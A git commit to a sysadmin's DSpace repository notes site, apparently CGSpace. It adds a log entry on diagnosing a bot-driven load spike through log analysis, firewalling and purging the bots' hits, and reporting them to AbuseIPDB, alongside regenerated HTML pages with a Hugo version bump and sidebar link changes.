Add notes for 2022-04-27

This commit is contained in:
Alan Orth 2022-04-27 09:58:45 +03:00
parent 4ddc675e55
commit 5cfe954a53
Signed by: alanorth
GPG Key ID: 0FB860CC9C45B1B9
123 changed files with 1461 additions and 655 deletions

View File

@ -228,4 +228,149 @@ $ ./ilri/fix-metadata-values.py -i /tmp/regions.csv -db dspace -u dspace -p 'fuu
- Then I started a new harvest on AReS
## 2022-04-27
- I woke up to many up down notices for CGSpace from UptimeRobot
- The server has load 111.0... sigh.
- According to Grafana it seems to have started at 4:00 AM
![Grafana load](/cgspace-notes/2022/04/cgspace-load.png)
- There are a metric fuck ton of database locks from the XMLUI:
```console
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi)' | sort | uniq -c
128 dspaceApi
16890 dspaceWeb
```
- As for the server logs, I don't see many IPs connecting today:
```console
# cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq | wc -l
2924
```
- But there appear to be some IPs making many requests:
```console
# cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -h
...
345 207.46.13.53
646 66.249.66.222
678 54.90.79.112
1529 136.243.148.249
1797 54.175.8.110
2304 174.129.118.171
2523 66.249.66.221
2632 52.73.204.196
2667 54.174.240.122
5206 35.172.193.232
5646 35.153.131.101
6373 3.85.92.145
7383 34.227.10.4
8330 100.24.63.172
8342 34.236.36.176
8369 44.200.190.111
8371 3.238.116.153
8391 18.232.101.158
8631 3.239.81.247
8634 54.82.125.225
```
- 54.82.125.225, 3.239.81.247, 18.232.101.158, 3.238.116.153, 44.200.190.111, 34.236.36.176, 100.24.63.172, 3.85.92.145, 35.153.131.101, 35.172.193.232, 54.174.240.122, 52.73.204.196, 174.129.118.171, 54.175.8.110, and 54.90.79.112 are all on Amazon and using this normal-looking user agent:
```
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.3
```
- None of these hosts are re-using their DSpace session ID so they are definitely not normal browsers as they are claiming:
```console
$ grep 54.82.125.225 dspace.log.2022-04-27 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
5760
$ grep 3.239.81.247 dspace.log.2022-04-27 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
6053
$ grep 18.232.101.158 dspace.log.2022-04-27 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
5841
$ grep 3.238.116.153 dspace.log.2022-04-27 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
5887
$ grep 44.200.190.111 dspace.log.2022-04-27 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
5899
...
```
- And we can see a massive spike in sessions in Munin:
![Grafana load](/cgspace-notes/2022/04/jmx_dspace_sessions-day2.png)
- I see the following IPs using that user agent today:
```console
# grep 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36' /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -h
678 54.90.79.112
1797 54.175.8.110
2697 174.129.118.171
2765 52.73.204.196
3072 54.174.240.122
5206 35.172.193.232
5646 35.153.131.101
6783 3.85.92.145
7763 34.227.10.4
8738 100.24.63.172
8748 34.236.36.176
8787 3.238.116.153
8794 18.232.101.158
8806 44.200.190.111
9021 54.82.125.225
9027 3.239.81.247
```
- I added those IPs to the firewall and then purged their hits from Solr:
```console
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
Purging 6024 hits from 100.24.63.172 in statistics
Purging 1719 hits from 174.129.118.171 in statistics
Purging 5972 hits from 18.232.101.158 in statistics
Purging 6053 hits from 3.238.116.153 in statistics
Purging 6228 hits from 3.239.81.247 in statistics
Purging 5305 hits from 34.227.10.4 in statistics
Purging 6002 hits from 34.236.36.176 in statistics
Purging 3908 hits from 35.153.131.101 in statistics
Purging 3692 hits from 35.172.193.232 in statistics
Purging 4525 hits from 3.85.92.145 in statistics
Purging 6048 hits from 44.200.190.111 in statistics
Purging 1942 hits from 52.73.204.196 in statistics
Purging 1944 hits from 54.174.240.122 in statistics
Purging 1264 hits from 54.175.8.110 in statistics
Purging 6117 hits from 54.82.125.225 in statistics
Purging 486 hits from 54.90.79.112 in statistics
Total number of bot hits purged: 67229
```
- Then I created a CSV with these IPs and reported them to AbuseIPDB.com:
```console
$ cat /tmp/ips.csv
IP,Categories,ReportDate,Comment
100.24.63.172,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
174.129.118.171,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
18.232.101.158,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
3.238.116.153,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
3.239.81.247,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
34.227.10.4,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
34.236.36.176,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
35.153.131.101,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
35.172.193.232,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
3.85.92.145,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
44.200.190.111,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
52.73.204.196,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
54.174.240.122,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
54.175.8.110,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
54.82.125.225,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
54.90.79.112,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
```
<!-- vim: set sw=2 ts=2: -->

View File

@ -34,7 +34,7 @@ Last week I had increased the limit from 30 to 60, which seemed to help, but now
$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspace
78
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -242,9 +242,9 @@ db.statementpool = true
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -36,7 +36,7 @@ Replace lzop with xz in log compression cron jobs on DSpace Test—it uses less
-rw-rw-r-- 1 tomcat7 tomcat7 387K Nov 18 23:59 dspace.log.2015-11-18.lzo
-rw-rw-r-- 1 tomcat7 tomcat7 169K Nov 18 23:59 dspace.log.2015-11-18.xz
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -264,9 +264,9 @@ $ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -28,7 +28,7 @@ Move ILRI collection 10568/12503 from 10568/27869 to 10568/27629 using the move_
I realized it is only necessary to clear the Cocoon cache after moving collections—rather than reindexing—as no metadata has changed, and therefore no search or browse indexes need to be updated.
Update GitHub wiki for documentation of maintenance tasks.
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -200,9 +200,9 @@ $ find SimpleArchiveForBio/ -iname &ldquo;*.pdf&rdquo; -exec basename {} ; | sor
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -38,7 +38,7 @@ I noticed we have a very interesting list of countries on CGSpace:
Not only are there 49,000 countries, we have some blanks (25)&hellip;
Also, lots of things like &ldquo;COTE D`LVOIRE&rdquo; and &ldquo;COTE D IVOIRE&rdquo;
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -378,9 +378,9 @@ Bitstream: tést señora alimentación.pdf
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -28,7 +28,7 @@ Looking at issues with author authorities on CGSpace
For some reason we still have the index-lucene-update cron job active on CGSpace, but I&rsquo;m pretty sure we don&rsquo;t need it as of the latest few versions of Atmire&rsquo;s Listings and Reports module
Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Java JDK 1.7 to match environment on CGSpace server
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -316,9 +316,9 @@ Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Ja
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -32,7 +32,7 @@ After running DSpace for over five years I&rsquo;ve never needed to look in any
This will save us a few gigs of backup space we&rsquo;re paying for on S3
Also, I noticed the checker log has some errors we should pay attention to:
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -495,9 +495,9 @@ dspace.log.2016-04-27:7271
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -34,7 +34,7 @@ There are 3,000 IPs accessing the REST API in a 24-hour period!
# awk &#39;{print $1}&#39; /var/log/nginx/rest.log | uniq | wc -l
3168
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -371,9 +371,9 @@ sys 0m20.540s
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -34,7 +34,7 @@ This is their publications set: http://ebrary.ifpri.org/oai/oai.php?verb=ListRec
You can see the others by using the OAI ListSets verb: http://ebrary.ifpri.org/oai/oai.php?verb=ListSets
Working on second phase of metadata migration, looks like this will work for moving CPWF-specific data in dc.identifier.fund to cg.identifier.cpwfproject and then the rest to dc.description.sponsorship
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -409,9 +409,9 @@ $ ./delete-metadata-values.py -f dc.contributor.corporate -i Corporate-Authors-D
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -44,7 +44,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
In this case the select query was showing 95 results before the update
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -325,9 +325,9 @@ discovery.index.authority.ignore-variants=true
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -42,7 +42,7 @@ $ git checkout -b 55new 5_x-prod
$ git reset --hard ilri/5_x-prod
$ git rebase -i dspace-5.5
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -389,9 +389,9 @@ $ JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx512m&#34; /home/cgspace.cgiar.org/bin
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -34,7 +34,7 @@ It looks like we might be able to use OUs now, instead of DCs:
$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &#34;dc=cgiarad,dc=org&#34; -D &#34;admigration1@cgiarad.org&#34; -W &#34;(sAMAccountName=admigration1)&#34;
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -606,9 +606,9 @@ $ ./delete-metadata-values.py -i ilrisubjects-delete-13.csv -f cg.subject.ilri -
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -42,7 +42,7 @@ I exported a random item&rsquo;s metadata as CSV, deleted all columns except id
0000-0002-6115-0956||0000-0002-3812-8793||0000-0001-7462-405X
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -372,9 +372,9 @@ dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;h
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -26,7 +26,7 @@ Add dc.type to the output options for Atmire&rsquo;s Listings and Reports module
Add dc.type to the output options for Atmire&rsquo;s Listings and Reports module (#286)
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -548,9 +548,9 @@ org.dspace.discovery.SearchServiceException: Error executing query
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -46,7 +46,7 @@ I see thousands of them in the logs for the last few months, so it&rsquo;s not r
I&rsquo;ve raised a ticket with Atmire to ask
Another worrying error from dspace.log is:
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -784,9 +784,9 @@ $ exit
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -28,7 +28,7 @@ I checked to see if the Solr sharding task that is supposed to run on January 1s
I tested on DSpace Test as well and it doesn&rsquo;t work there either
I asked on the dspace-tech mailing list because it seems to be broken, and actually now I&rsquo;m not sure if we&rsquo;ve ever had the sharding task run successfully over all these years
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -369,9 +369,9 @@ $ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook -dNOPAUSE -
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -50,7 +50,7 @@ DELETE 1
Create issue on GitHub to track the addition of CCAFS Phase II project tags (#301)
Looks like we&rsquo;ll be using cg.identifier.ccafsprojectpii as the field name
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -423,9 +423,9 @@ COPY 1968
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -54,7 +54,7 @@ Interestingly, it seems DSpace 4.x&rsquo;s thumbnails were sRGB, but forcing reg
$ identify ~/Desktop/alc_contrastes_desafios.jpg
/Users/aorth/Desktop/alc_contrastes_desafios.jpg JPEG 464x600 464x600&#43;0&#43;0 8-bit CMYK 168KB 0.000u 0:00.000
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -355,9 +355,9 @@ $ ./delete-metadata-values.py -i Investors-Delete-121.csv -f dc.description.spon
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -40,7 +40,7 @@ Testing the CMYK patch on a collection with 650 items:
$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&amp; /tmp/filter-media-cmyk.txt
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -585,9 +585,9 @@ $ gem install compass -v 1.0.3
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -18,7 +18,7 @@
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="May, 2017"/>
<meta name="twitter:description" content="2017-05-01 ICARDA apparently started working on CG Core on their MEL repository They have done a few cg.* fields, but not very consistent and even copy some of CGSpace items: https://mel.cgiar.org/xmlui/handle/20.500.11766/6911?show=full https://cgspace.cgiar.org/handle/10568/73683 2017-05-02 Atmire got back about the Workflow Statistics issue, and apparently it&rsquo;s a bug in the CUA module so they will send us a pull request 2017-05-04 Sync DSpace Test with database and assetstore from CGSpace Re-deploy DSpace Test with Atmire&rsquo;s CUA patch for workflow statistics, run system updates, and restart the server Now I can see the workflow statistics and am able to select users, but everything returns 0 items Megan says there are still some mapped items are not appearing since last week, so I forced a full index-discovery -b Need to remember to check if the collection has more items (currently 39 on CGSpace, but 118 on the freshly reindexed DSPace Test) tomorrow: https://cgspace."/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -391,9 +391,9 @@ UPDATE 187
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -18,7 +18,7 @@
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="June, 2017"/>
<meta name="twitter:description" content="2017-06-01 After discussion with WLE and CGSpace content people, we decided to just add one metadata field for the WLE Research Themes The cg.identifier.wletheme field will be used for both Phase I and Phase II Research Themes Then we&rsquo;ll create a new sub-community for Phase II and create collections for the research themes there The current &ldquo;Research Themes&rdquo; community will be renamed to &ldquo;WLE Phase I Research Themes&rdquo; Tagged all items in the current Phase I collections with their appropriate themes Create pull request to add Phase II research themes to the submission form: #328 Add cg."/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -270,9 +270,9 @@ $ JAVA_OPTS=&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34; [dspace]/bin/dspace import
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -36,7 +36,7 @@ Merge changes for WLE Phase II theme rename (#329)
Looking at extracting the metadata registries from ICARDA&rsquo;s MEL DSpace database so we can compare fields with CGSpace
We can use PostgreSQL&rsquo;s extended output format (-x) plus sed to format the output into quasi XML:
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -275,9 +275,9 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -60,7 +60,7 @@ This was due to newline characters in the dc.description.abstract column, which
I exported a new CSV from the collection on DSpace Test and then manually removed the characters in vim using g/^$/d
Then I cleaned up the author authorities and HTML characters in OpenRefine and sent the file back to Abenet
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -517,9 +517,9 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -32,7 +32,7 @@ Linode sent an alert that CGSpace (linode18) was using 261% CPU for the past two
Ask Sisay to clean up the WLE approvers a bit, as Marianne&rsquo;s user account is both in the approvers step as well as the group
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -659,9 +659,9 @@ Cert Status: good
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -34,7 +34,7 @@ http://hdl.handle.net/10568/78495||http://hdl.handle.net/10568/79336
There appears to be a pattern but I&rsquo;ll have to look a bit closer and try to clean them up automatically, either in SQL or in OpenRefine
Add Katherine Lutz to the groups for content submission and edit steps of the CGIAR System collections
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -443,9 +443,9 @@ session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -48,7 +48,7 @@ Generate list of authors on CGSpace for Peter to go through and correct:
dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
COPY 54701
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -944,9 +944,9 @@ $ cat dspace.log.2017-11-28 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sor
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -30,7 +30,7 @@ The logs say &ldquo;Timeout waiting for idle object&rdquo;
PostgreSQL activity says there are 115 connections currently
The list of connections to XMLUI and REST API for today:
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -783,9 +783,9 @@ DELETE 20
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -150,7 +150,7 @@ dspace.log.2018-01-02:34
Danny wrote to ask for help renewing the wildcard ilri.org certificate and I advised that we should probably use Let&rsquo;s Encrypt if it&rsquo;s just a handful of domains
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -1452,9 +1452,9 @@ Catalina:type=Manager,context=/,host=localhost activeSessions 8
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -30,7 +30,7 @@ We don&rsquo;t need to distinguish between internal and external works, so that
Yesterday I figured out how to monitor DSpace sessions using JMX
I copied the logic in the jmx_tomcat_dbpools provided by Ubuntu&rsquo;s munin-plugins-java package and used the stuff I discovered about JMX in 2018-01
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -1038,9 +1038,9 @@ UPDATE 3
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -24,7 +24,7 @@ Export a CSV of the IITA community metadata for Martin Mueller
Export a CSV of the IITA community metadata for Martin Mueller
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -585,9 +585,9 @@ Fixed 5 occurences of: GENEBANKS
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -26,7 +26,7 @@ Catalina logs at least show some memory errors yesterday:
I tried to test something on DSpace Test but noticed that it&rsquo;s down since god knows when
Catalina logs at least show some memory errors yesterday:
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -594,9 +594,9 @@ $ pg_restore -O -U dspacetest -d dspacetest -W -h localhost /tmp/dspace_2018-04-
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
